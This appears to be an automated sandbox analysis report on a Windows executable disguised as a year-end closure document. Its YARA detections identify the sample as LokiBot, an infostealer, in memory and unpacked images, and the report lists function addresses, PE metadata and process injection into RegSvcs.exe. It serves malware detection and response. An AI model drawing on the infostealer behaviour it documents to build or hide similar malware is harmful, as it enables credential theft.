Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7996, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: IOsbBBIDAm.exe PID: 8056, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_00792370	0_2_00792370
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_00790F40	0_2_00790F40
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_00792C98	0_2_00792C98
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_007937A8	0_2_007937A8
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_0738A700	0_2_0738A700
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_07389658	0_2_07389658
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_073884C0	0_2_073884C0
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_07388088	0_2_07388088
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_07389D00	0_2_07389D00
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_0738BD61	0_2_0738BD61
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_07389CEF	0_2_07389CEF
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_073898C8	0_2_073898C8
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Code function: 0_2_07AE0040	0_2_07AE0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0040549C	8_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_004029D4	8_2_004029D4
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Code function: 9_2_025A2370	9_2_025A2370
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Code function: 9_2_025A0F40	9_2_025A0F40
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Code function: 9_2_025A2267	9_2_025A2267
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Code function: 9_2_025A228A	9_2_025A228A
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Code function: 9_2_025A0E79	9_2_025A0E79
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Code function: 9_2_025A0ED8	9_2_025A0ED8
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Code function: 9_2_025A2C98	9_2_025A2C98
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Code function: 9_2_025A2C88	9_2_025A2C88
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Code function: 9_2_025A3769	9_2_025A3769
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Code function: 9_2_025A37A8	9_2_025A37A8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8056 -s 1768

Source: CLOSURE DATE FOR THE YEAR.exe

Static PE information: invalid certificate

Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1758814861.0000000007B3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs CLOSURE DATE FOR THE YEAR.exe
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1755400023.0000000003D11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs CLOSURE DATE FOR THE YEAR.exe
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1753532867.00000000007DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs CLOSURE DATE FOR THE YEAR.exe
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1754216796.00000000024D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs CLOSURE DATE FOR THE YEAR.exe
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1757968547.00000000072F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs CLOSURE DATE FOR THE YEAR.exe
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000000.1656803047.00000000000B2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAYyv.exe: vs CLOSURE DATE FOR THE YEAR.exe
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1760516309.0000000009470000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs CLOSURE DATE FOR THE YEAR.exe
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1755400023.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs CLOSURE DATE FOR THE YEAR.exe
Source: CLOSURE DATE FOR THE YEAR.exe	Binary or memory string: OriginalFilenameAYyv.exe: vs CLOSURE DATE FOR THE YEAR.exe

Source: CLOSURE DATE FOR THE YEAR.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7996, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: IOsbBBIDAm.exe PID: 8056, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: CLOSURE DATE FOR THE YEAR.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: IOsbBBIDAm.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, tgq5K1s6GeBooaKkHr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, tgq5K1s6GeBooaKkHr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, jviyFnUkOEMiWAYfmN.cs	Security API names: _0020.SetAccessControl
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, jviyFnUkOEMiWAYfmN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, jviyFnUkOEMiWAYfmN.cs	Security API names: _0020.AddAccessRule
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, tgq5K1s6GeBooaKkHr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, jviyFnUkOEMiWAYfmN.cs	Security API names: _0020.SetAccessControl
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, jviyFnUkOEMiWAYfmN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, jviyFnUkOEMiWAYfmN.cs	Security API names: _0020.AddAccessRule
